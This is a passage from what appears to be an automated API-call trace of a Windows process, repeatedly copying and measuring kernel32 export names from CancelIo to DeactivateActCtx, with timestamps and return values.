lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0180.669] lstrlenA (lpString="CANCELIO") returned 8 [0180.669] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0180.669] lstrlenA (lpString="CANCELIOEX") returned 10 [0180.669] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0180.669] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0180.669] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0180.669] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0180.670] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0180.670] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0180.670] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0180.670] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0180.670] lstrcpyA (in: lpString1=0x36fce30, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0180.670] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0180.670] lstrcpyA (in: lpString1=0x36fce30, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0180.670] lstrlenA (lpString="CHECKELEVATION") returned 14 [0180.670] lstrcpyA (in: lpString1=0x36fce30, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0180.670] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0180.670] lstrcpyA (in: lpString1=0x36fce30, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0180.670] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0180.670] lstrcpyA (in: lpString1=0x36fce30, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0180.670] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0180.670] lstrcpyA (in: lpString1=0x36fce30, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0180.670] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0180.670] lstrcpyA (in: lpString1=0x36fce30, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0180.670] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0180.670] lstrcpyA (in: lpString1=0x36fce30, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0180.670] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0180.670] lstrcpyA (in: lpString1=0x36fce30, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0180.670] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0180.670] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0180.670] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0180.670] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0180.670] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0180.670] lstrcpyA (in: lpString1=0x36fce30, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0180.670] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0180.670] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0180.670] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0180.670] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0180.670] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0180.670] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0180.670] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0180.670] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0180.670] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0180.670] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0180.670] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0180.670] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0180.671] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0180.671] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0180.671] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0180.671] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0180.671] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0180.671] lstrcpyA (in: lpString1=0x36fce30, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0180.671] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0180.671] lstrcpyA (in: lpString1=0x36fce30, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0180.671] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0180.671] lstrcpyA (in: lpString1=0x36fce30, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0180.671] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0180.671] lstrcpyA (in: lpString1=0x36fce30, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0180.671] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0180.671] lstrcpyA (in: lpString1=0x36fce30, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0180.671] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0180.671] lstrcpyA (in: lpString1=0x36fce30, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0180.671] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0180.671] lstrcpyA (in: lpString1=0x36fce30, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0180.671] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0180.671] lstrcpyA (in: lpString1=0x36fce30, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0180.671] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0180.671] lstrcpyA (in: lpString1=0x36fce30, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0180.671] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0180.671] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0180.671] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0180.671] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0180.671] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0180.671] lstrcpyA (in: lpString1=0x36fce30, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0180.671] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0180.671] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0180.671] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0180.671] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0180.671] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0180.671] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0180.671] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0180.671] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0180.671] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0180.671] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0180.671] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0180.672] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0180.672] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0180.672] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0180.672] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0180.672] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0180.672] lstrlenA (lpString="COPYCONTEXT") returned 11 [0180.672] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0180.672] lstrlenA (lpString="COPYFILEA") returned 9 [0180.672] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0180.672] lstrlenA (lpString="COPYFILEEXA") returned 11 [0180.672] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0180.672] lstrlenA (lpString="COPYFILEEXW") returned 11 [0180.672] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0180.672] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0180.672] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0180.672] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0180.672] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0180.672] lstrlenA (lpString="COPYFILEW") returned 9 [0180.672] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0180.672] lstrlenA (lpString="COPYLZFILE") returned 10 [0180.673] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0180.673] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0180.673] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0180.673] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0180.673] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0180.673] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0180.673] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0180.673] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0180.673] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0180.673] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0180.673] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0180.673] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0180.673] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0180.673] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0180.673] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0180.673] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0180.673] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0180.673] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0180.673] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0180.673] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0180.673] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0180.673] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0180.673] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0180.673] lstrlenA (lpString="CREATEEVENTA") returned 12 [0180.673] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0180.673] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0180.673] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0180.673] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0180.673] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0180.673] lstrlenA (lpString="CREATEEVENTW") returned 12 [0180.673] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0180.673] lstrlenA (lpString="CREATEFIBER") returned 11 [0180.673] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0180.673] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0180.673] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0180.673] lstrlenA (lpString="CREATEFILEA") returned 11 [0180.673] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0180.674] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0180.674] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0180.674] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0180.674] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0180.674] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0180.674] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0180.674] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0180.674] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0180.674] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0180.674] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0180.674] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0180.674] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0180.674] lstrlenA (lpString="CREATEFILEW") returned 11 [0180.674] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0180.674] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0180.674] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0180.674] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0180.674] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0180.674] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0180.674] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0180.674] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0180.674] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0180.674] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0180.674] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0180.674] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0180.674] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0180.674] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0180.674] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0180.674] lstrlenA (lpString="CREATEJOBSET") returned 12 [0180.674] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0180.674] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0180.674] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0180.674] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0180.674] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0180.674] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0180.674] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0180.674] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0180.674] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0180.674] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0180.675] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0180.675] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0180.675] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0180.675] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0180.675] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0180.675] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0180.675] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0180.675] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0180.675] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0180.675] lstrlenA (lpString="CREATEPIPE") returned 10 [0180.675] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0180.675] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0180.675] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0180.675] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0180.675] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0180.675] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0180.675] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0180.675] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0180.675] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0180.675] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0180.675] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0180.675] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0180.675] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0180.675] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0180.675] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0180.675] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0180.675] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0180.675] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0180.675] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0180.675] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0180.675] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0180.675] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0180.675] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0180.675] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0180.675] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0180.675] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0180.675] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0180.675] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0180.675] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0180.676] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0180.676] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0180.676] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0180.676] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0180.676] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0180.676] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0180.676] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0180.676] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0180.676] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0180.676] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0180.676] lstrlenA (lpString="CREATETHREAD") returned 12 [0180.676] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0180.676] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0180.676] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0180.676] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0180.676] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0180.676] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0180.676] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0180.676] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0180.676] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0180.676] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0180.676] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0180.676] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0180.676] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0180.676] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0180.676] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0180.676] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0180.676] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0180.676] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0180.676] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0180.676] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0180.676] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0180.676] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0180.676] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0180.676] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0180.676] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0180.676] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0180.676] lstrcpyA (in: lpString1=0x36fce30, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0180.676] lstrlenA (lpString="CTRLROUTINE") returned 11 [0180.677] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0180.677] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0180.677] lstrcpyA (in: lpString1=0x36fce30, 